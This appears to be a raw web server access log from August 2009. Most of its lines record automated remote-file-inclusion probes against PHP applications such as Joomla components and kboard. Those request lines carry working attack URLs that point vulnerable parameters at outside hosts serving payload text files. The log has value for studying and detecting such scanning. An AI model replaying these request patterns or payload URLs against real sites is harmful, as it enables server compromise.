117.110.74.195 - - [12/Aug/2009:00:15:39 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:15:39 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:15:39 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:15:39 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.181.7.56 - - [12/Aug/2009:00:15:58 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.206.123.139 - - [12/Aug/2009:00:16:12 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.206.123.139 - - [12/Aug/2009:00:16:14 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:16:18 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:16:18 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:16:18 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:16:18 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:16:28 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:16:32 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:16:34 -0400] "GET /logs/access_log.Q109080100//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.191.102.117 - - [12/Aug/2009:00:16:34 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.161.196.26 - - [12/Aug/2009:00:16:41 -0400] "GET /logs/error_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:00:17:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.202.2.220 - - [12/Aug/2009:00:17:21 -0400] "GET //?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:17:21 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:17:21 -0400] "GET /logs//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:17:23 -0400] "GET //?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:17:31 -0400] "GET /logs//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:17:31 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:17:35 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:17:44 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:17:51 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:18:06 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:18:25 -0400] "GET //viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:18:25 -0400] "GET /logs//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:18:30 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:18:31 -0400] "GET //viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:18:31 -0400] "GET /logs//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:18:31 -0400] "GET /logs/access_log.Q109051600%20%20//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Aug/2009:00:18:42 -0400] "GET //viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Aug/2009:00:18:42 -0400] "GET /logs//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Aug/2009:00:18:45 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Aug/2009:00:18:49 -0400] "GET //viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Aug/2009:00:18:49 -0400] "GET /logs//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Aug/2009:00:18:50 -0400] "GET /logs/access_log.Q109051600%20%20//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:19:08 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
204.30.3.225 - - [12/Aug/2009:00:19:10 -0400] "GET //?path%5Bdocroot%5D=http://mmf.mb.ca/images/stories/folder/pid.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
204.30.3.225 - - [12/Aug/2009:00:19:10 -0400] "GET /logs//?path%5Bdocroot%5D=http://mmf.mb.ca/images/stories/folder/pid.txt??? HTTP/1.1" 200 13349 "-" "Mozilla/5.0"
204.30.3.225 - - [12/Aug/2009:00:19:10 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://mmf.mb.ca/images/stories/folder/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:19:13 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.125.66.121 - - [12/Aug/2009:00:19:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
117.110.74.195 - - [12/Aug/2009:00:19:34 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:19:34 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:19:39 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:19:39 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.218.116.164 - - [12/Aug/2009:00:19:52 -0400] "GET /logs/access_log.Q109042200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.78.116.209 - - [12/Aug/2009:00:19:59 -0400] "GET //admin/classes/errors.php?error=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:19:59 -0400] "GET /logs//admin/classes/errors.php?error=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.111.176.66 - - [12/Aug/2009:00:20:02 -0400] "GET /logs/access_log.Q109062000/index.php?_SERVER[DOCUMENT_ROOT]=http://www.arlrock.at/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
89.111.176.66 - - [12/Aug/2009:00:20:03 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.arlrock.at/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
89.111.176.66 - - [12/Aug/2009:00:20:03 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.arlrock.at/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
89.111.176.66 - - [12/Aug/2009:00:20:28 -0400] "GET /logs/error_log.Q109062000/index.php?_SERVER[DOCUMENT_ROOT]=http://www.arlrock.at/ec.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
91.121.83.177 - - [12/Aug/2009:00:20:36 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:20:42 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:20:46 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:20:50 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:21:27 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:21:27 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
204.30.3.225 - - [12/Aug/2009:00:21:34 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://mmf.mb.ca/images/stories/folder/pid.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:21:41 -0400] "GET /logs//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:21:41 -0400] "GET //viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
207.210.126.218 - - [12/Aug/2009:00:21:41 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:21:53 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:21:53 -0400] "GET /logs/error_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:21:53 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:00:21:54 -0400] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:00:21:54 -0400] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:00:21:54 -0400] "GET /logs/access_log.Q109062100//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:00:21:55 -0400] "GET /logs/access_log.Q109062100%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:21:56 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.158.22.128 - - [12/Aug/2009:00:21:56 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://tikihub.com//ray/modules/movie/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:00:21:59 -0400] "GET /logs/access_log.Q109071700%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:00:22:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.111.176.66 - - [12/Aug/2009:00:22:05 -0400] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://www.arlrock.at/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
89.111.176.66 - - [12/Aug/2009:00:22:05 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.arlrock.at/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
89.111.176.66 - - [12/Aug/2009:00:22:05 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.arlrock.at/ec.txt? HTTP/1.1" 200 13344 "-" "libwww-perl/5.805"
110.45.146.223 - - [12/Aug/2009:00:22:32 -0400] "GET //viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Aug/2009:00:22:32 -0400] "GET /logs//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Aug/2009:00:22:32 -0400] "GET /logs/access_log.Q109051600//viewbody.html?code=http://www.phoxlab.com.br//xmlrpc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
98.116.62.213 - - [12/Aug/2009:00:22:34 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://snowmovement.com/info? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
66.244.236.248 - - [12/Aug/2009:00:22:40 -0400] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.244.236.248 - - [12/Aug/2009:00:22:40 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.244.236.248 - - [12/Aug/2009:00:22:41 -0400] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.175.22.106 - - [12/Aug/2009:00:22:55 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.175.22.106 - - [12/Aug/2009:00:22:55 -0400] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.175.22.106 - - [12/Aug/2009:00:22:55 -0400] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.244.236.248 - - [12/Aug/2009:00:22:57 -0400] "GET /logs/access_log.Q109070500//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.202.64 - - [12/Aug/2009:00:22:59 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.202.64 - - [12/Aug/2009:00:22:59 -0400] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
94.23.202.64 - - [12/Aug/2009:00:22:59 -0400] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.175.22.106 - - [12/Aug/2009:00:23:05 -0400] "GET /logs/access_log.Q109070500//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
94.23.202.64 - - [12/Aug/2009:00:23:07 -0400] "GET /logs/access_log.Q109070500//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:23:09 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:00:23:20 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:00:23:20 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Aug/2009:00:23:20 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://hannegirls.ms.kr/board/skin/uks_gallery_v2010//id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
93.187.200.218 - - [12/Aug/2009:00:23:22 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zetan.fileave.com/zx.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:23:23 -0400] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:23:24 -0400] "GET /logs/access_log.Q109070800//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:23:24 -0400] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:23:33 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
204.30.3.225 - - [12/Aug/2009:00:23:35 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://mmf.mb.ca/images/stories/folder/pid.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.22 - - [12/Aug/2009:00:23:35 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.221.130.22 - - [12/Aug/2009:00:23:35 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.221.130.22 - - [12/Aug/2009:00:23:35 -0400] "GET /logs/access_log.Q109051100%20%20//include/admin.lib.inc.php?site_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:23:38 -0400] "GET /logs/access_log.Q109070500//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.202.2.220 - - [12/Aug/2009:00:23:49 -0400] "GET /logs/access_log.Q109072900%20%20//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:23:50 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
117.110.74.195 - - [12/Aug/2009:00:23:50 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [12/Aug/2009:00:24:02 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://h1.ripway.com/arif121/boss.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
200.93.147.154 - - [12/Aug/2009:00:24:02 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://h1.ripway.com/arif121/boss.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
200.93.147.154 - - [12/Aug/2009:00:24:02 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://h1.ripway.com/arif121/boss.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.202.2.220 - - [12/Aug/2009:00:24:11 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.22.106 - - [12/Aug/2009:00:24:16 -0400] "GET /logs/access_log.Q109070800%20%20//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.175.22.106 - - [12/Aug/2009:00:24:20 -0400] "GET /logs/access_log.Q109070500%20%20//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.244.236.248 - - [12/Aug/2009:00:24:30 -0400] "GET /logs/access_log.Q109070800%20%20//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.244.236.248 - - [12/Aug/2009:00:24:31 -0400] "GET /logs/access_log.Q109070500%20%20//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
